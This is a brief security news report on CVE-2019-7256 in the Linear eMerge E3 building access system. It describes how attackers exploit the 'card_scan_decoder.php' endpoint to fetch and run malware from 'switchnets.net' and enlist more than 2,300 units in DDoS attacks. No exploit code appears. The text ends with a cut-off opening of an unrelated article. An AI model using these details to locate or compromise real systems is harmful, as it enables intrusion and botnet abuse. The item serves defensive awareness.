The Linear eMerge E3 building access system, created by Linear Solutions, has an unpatched vulnerability that was first announced in May 2019, identified as CVE-2019-7256. In November 2019, code that provided a proof-of-concept exploit was released publicly. Now, researchers from Sonic Wall have warned that attackers are actively discovering vulnerable building access systems that are accessible directly over the Internet and exploiting them by sending a simple HTTP request to the systems. Attackers have already compromised over 2,300 of these systems and used them to launch distributed denial of service (DDoS) attacks. The vulnerability allows attackers to command the building access system to download any file, execute it, and run shell commands of the attackers’ choosing. Attackers have been using this vulnerability to target the “card_scan_decoder.php” resource in the web-based interface of eMerge E3 systems to download malware from the domain “switchnets.net” and immediately execute the malware. It is possible to use services such as Shodan to discover vulnerable eMerge E3 systems that are directly addressable on the Internet, and it is also practical for attackers to scan the entire range of IPv4 addresses to find vulnerable systems.
By Anthony Zampino Introduction Leading up to the most recent Russian invasion of Ukraine in